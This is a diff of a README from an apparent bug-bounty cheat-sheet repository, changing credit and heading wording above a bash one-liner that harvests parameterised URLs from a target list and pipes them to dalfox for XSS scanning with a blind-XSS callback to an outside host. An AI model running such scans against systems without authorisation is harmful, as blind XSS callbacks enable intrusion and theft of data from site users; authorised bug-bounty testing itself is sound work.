n0sandb0x/forloops-for-bugbounty/README.md

 # loops and one liners for bug bounty
-Credits goes to all those awesome researchers who uploaded these on Twitter
+Credits goes to all those awesome researchers who uploaded these on Twitter and their GitHub

 ## One Liners for XSS

-### You can also use DALFOX to send the result for xss
+### Using DALFOX to send the result for xss

 ```bash
 cat target_list| gau | egrep -o "http?.*" | grep "="| egrep -v ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace -a | dalfox pipe -blind https://yours.xss.ht -o result.txt